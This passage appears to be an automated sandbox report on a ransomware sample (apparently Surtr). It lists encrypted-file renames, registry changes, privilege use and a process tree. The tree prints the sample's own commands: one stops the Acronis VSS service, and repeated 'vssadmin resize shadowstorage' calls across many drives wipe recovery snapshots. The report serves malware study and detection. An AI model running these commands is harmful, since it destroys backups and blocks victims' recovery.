(x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15274_.GIF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSSPC.ECF.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File created C:\Program Files (x86)\Windows NT\Private_DATA.surt 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury.[[email protected]].SURT 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Time Discovery 1 TTPs 3 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1356 net.exe 968 net1.exe 2040 cmd.exe -
Interacts with shadow copies 3 TTPs 27 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2180 vssadmin.exe 2436 vssadmin.exe 2236 vssadmin.exe 600 vssadmin.exe 2372 vssadmin.exe 448 vssadmin.exe 320 vssadmin.exe 564 vssadmin.exe 236 vssadmin.exe 1980 vssadmin.exe 1824 vssadmin.exe 2256 vssadmin.exe 2096 vssadmin.exe 2440 vssadmin.exe 2336 vssadmin.exe 1040 vssadmin.exe 2104 vssadmin.exe 2412 vssadmin.exe 1316 vssadmin.exe 592 vssadmin.exe 2392 vssadmin.exe 2112 vssadmin.exe 1016 vssadmin.exe 912 vssadmin.exe 2452 vssadmin.exe 2352 vssadmin.exe 2388 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main Process not Found -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.surt Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico" Process not Found -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4488 Process not Found -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2464 Process not Found 1328 schtasks.exe 1796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2696 vssvc.exe Token: SeRestorePrivilege 2696 vssvc.exe Token: SeAuditPrivilege 2696 vssvc.exe Token: SeSecurityPrivilege 3792 wevtutil.exe Token: SeBackupPrivilege 3792 wevtutil.exe Token: SeSecurityPrivilege 3780 wevtutil.exe Token: SeBackupPrivilege 3780 wevtutil.exe Token: SeSecurityPrivilege 3756 wevtutil.exe Token: SeBackupPrivilege 3756 wevtutil.exe Token: SeSecurityPrivilege 2204 wevtutil.exe Token: SeBackupPrivilege 2204 wevtutil.exe Token: SeSecurityPrivilege 552 wevtutil.exe Token: SeBackupPrivilege 552 wevtutil.exe Token: SeSecurityPrivilege 1384 wevtutil.exe Token: SeBackupPrivilege 1384 wevtutil.exe Token: SeSecurityPrivilege 2968 wevtutil.exe Token: SeBackupPrivilege 2968 wevtutil.exe Token: SeSecurityPrivilege 1744 wevtutil.exe Token: SeBackupPrivilege 1744 wevtutil.exe Token: SeSecurityPrivilege 3720 wevtutil.exe Token: SeBackupPrivilege 3720 wevtutil.exe Token: SeSecurityPrivilege 3840 wevtutil.exe Token: SeBackupPrivilege 3840 wevtutil.exe Token: SeSecurityPrivilege 3676 wevtutil.exe Token: SeBackupPrivilege 3676 wevtutil.exe Token: SeSecurityPrivilege 3688 wevtutil.exe Token: SeBackupPrivilege 3688 wevtutil.exe Token: SeSecurityPrivilege 3700 wevtutil.exe Token: SeBackupPrivilege 3700 wevtutil.exe Token: SeSecurityPrivilege 3712 wevtutil.exe Token: SeBackupPrivilege 3712 wevtutil.exe Token: SeSecurityPrivilege 3664 wevtutil.exe Token: SeBackupPrivilege 3664 wevtutil.exe Token: SeSecurityPrivilege 3644 wevtutil.exe Token: SeBackupPrivilege 3644 wevtutil.exe Token: SeSecurityPrivilege 3636 wevtutil.exe Token: SeBackupPrivilege 3636 wevtutil.exe Token: SeSecurityPrivilege 2856 wevtutil.exe Token: SeBackupPrivilege 2856 wevtutil.exe Token: SeSecurityPrivilege 1684 wevtutil.exe Token: SeBackupPrivilege 1684 wevtutil.exe Token: SeSecurityPrivilege 1364 wevtutil.exe Token: SeBackupPrivilege 1364 wevtutil.exe Token: SeSecurityPrivilege 2348 wevtutil.exe Token: SeBackupPrivilege 2348 wevtutil.exe Token: SeSecurityPrivilege 2148 wevtutil.exe Token: SeBackupPrivilege 2148 wevtutil.exe Token: SeSecurityPrivilege 576 wevtutil.exe Token: SeBackupPrivilege 576 wevtutil.exe Token: SeSecurityPrivilege 1832 wevtutil.exe Token: SeBackupPrivilege 1832 wevtutil.exe Token: SeSecurityPrivilege 1348 wevtutil.exe Token: SeBackupPrivilege 1348 wevtutil.exe Token: SeSecurityPrivilege 1952 wevtutil.exe Token: SeBackupPrivilege 1952 wevtutil.exe Token: SeSecurityPrivilege 448 wevtutil.exe Token: SeBackupPrivilege 448 wevtutil.exe Token: SeSecurityPrivilege 3068 wevtutil.exe Token: SeBackupPrivilege 3068 wevtutil.exe Token: SeSecurityPrivilege 2840 wevtutil.exe Token: SeBackupPrivilege 2840 wevtutil.exe Token: SeSecurityPrivilege 1836 wevtutil.exe Token: SeBackupPrivilege 1836 wevtutil.exe Token: SeSecurityPrivilege 3968 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2656 wrote to memory of 2744 2656 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 31 PID 2744 wrote to memory of 2704 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 32 PID 2744 wrote to memory of 2704 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 32 PID 2744 wrote to memory of 2704 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 32 PID 2744 wrote to memory of 2696 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 124 PID 2744 wrote to memory of 2696 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 124 PID 2744 wrote to memory of 2696 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 124 PID 2744 wrote to memory of 2652 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 34 PID 2744 wrote to memory of 2652 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 34 PID 2744 wrote to memory of 2652 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 34 PID 2652 wrote to memory of 2680 2652 cmd.exe 35 PID 2652 wrote to memory of 2680 2652 cmd.exe 35 PID 2652 wrote to memory of 2680 2652 cmd.exe 35 PID 2744 wrote to memory of 2708 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 36 PID 2744 wrote to memory of 2708 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 36 PID 2744 wrote to memory of 2708 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 36 PID 2744 wrote to memory of 2868 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 174 PID 2744 wrote to memory of 2868 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 174 PID 2744 wrote to memory of 2868 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 174 PID 2744 wrote to memory of 2884 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 38 PID 2744 wrote to memory of 2884 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 38 PID 2744 wrote to memory of 2884 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 38 PID 2744 wrote to memory of 2732 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 39 PID 2744 wrote to memory of 2732 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 39 PID 2744 wrote to memory of 2732 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 39 PID 2744 wrote to memory of 2712 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 168 PID 2744 wrote to memory of 2712 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 168 PID 2744 wrote to memory of 2712 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 168 PID 2744 wrote to memory of 2816 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 41 PID 2744 wrote to memory of 2816 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 41 PID 2744 wrote to memory of 2816 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 41 PID 2744 wrote to memory of 2752 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 42 PID 2744 wrote to memory of 2752 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 42 PID 2744 wrote to memory of 2752 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 42 PID 2744 wrote to memory of 2576 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 43 PID 2744 wrote to memory of 2576 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 43 PID 2744 wrote to memory of 2576 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 43 PID 2744 wrote to memory of 2612 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 44 PID 2744 wrote to memory of 2612 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 44 PID 2744 wrote to memory of 2612 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 44 PID 2744 wrote to memory of 1984 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 45 PID 2744 wrote to memory of 1984 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 45 PID 2744 wrote to memory of 1984 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 45 PID 2744 wrote to memory of 1632 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 46 PID 2744 wrote to memory of 1632 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 46 PID 2744 wrote to memory of 1632 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 46 PID 2744 wrote to memory of 3056 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 207 PID 2744 wrote to memory of 3056 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 207 PID 2744 wrote to memory of 3056 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 207 PID 2744 wrote to memory of 1624 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 48 PID 2744 wrote to memory of 1624 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 48 PID 2744 wrote to memory of 1624 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 48 PID 2744 wrote to memory of 2424 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 49 PID 2744 wrote to memory of 2424 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 49 PID 2744 wrote to memory of 2424 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 49 PID 2744 wrote to memory of 1596 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 50 PID 2744 wrote to memory of 1596 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 50 PID 2744 wrote to memory of 1596 2744 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 4156 Process not Found 1956 Process not Found 1564 attrib.exe 2032 attrib.exe 2808 Process not Found 2936 Process not Found 2120 Process not Found 4404 Process not Found
Processes
-
C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"2⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service3⤵PID:2704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off3⤵PID:2696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4373⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\chcp.comchcp 4374⤵PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"3⤵PID:2708
-
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"4⤵PID:1720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider"5⤵PID:1800
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵PID:2868
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB4⤵PID:1564
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:320
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵PID:2884
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵PID:2608
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵PID:2732
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB4⤵PID:996
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:448
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵PID:2712
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB4⤵PID:1680
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵PID:2816
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB4⤵PID:956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:564
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵PID:2752
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB4⤵PID:2348
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2452
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵PID:2576
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB4⤵PID:1620
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2412
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵PID:2612
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB4⤵PID:1696
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵PID:1984
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB4⤵PID:316
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2392
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵PID:1632
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB4⤵PID:2272
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2112
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵PID:3056
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB4⤵PID:2400
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1980
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵PID:1624
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB4⤵PID:668
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2336
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵PID:2424
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB4⤵PID:2404
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2352
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵PID:1596
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB4⤵PID:2616
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:592
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵PID:1296
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB4⤵PID:2476
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2256
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵PID:2876
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB4⤵PID:1808
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:912
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵PID:2892
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB4⤵PID:2268
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1316
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵PID:2916
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB4⤵PID:2532
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2096
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵PID:3028
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB4⤵PID:1872
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2372
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵PID:1828
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB4⤵PID:2848
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2104
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵PID:2136
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB4⤵PID:2292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2436
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB3⤵PID:2384
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB4⤵PID:2840
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2236
-
-
-
-
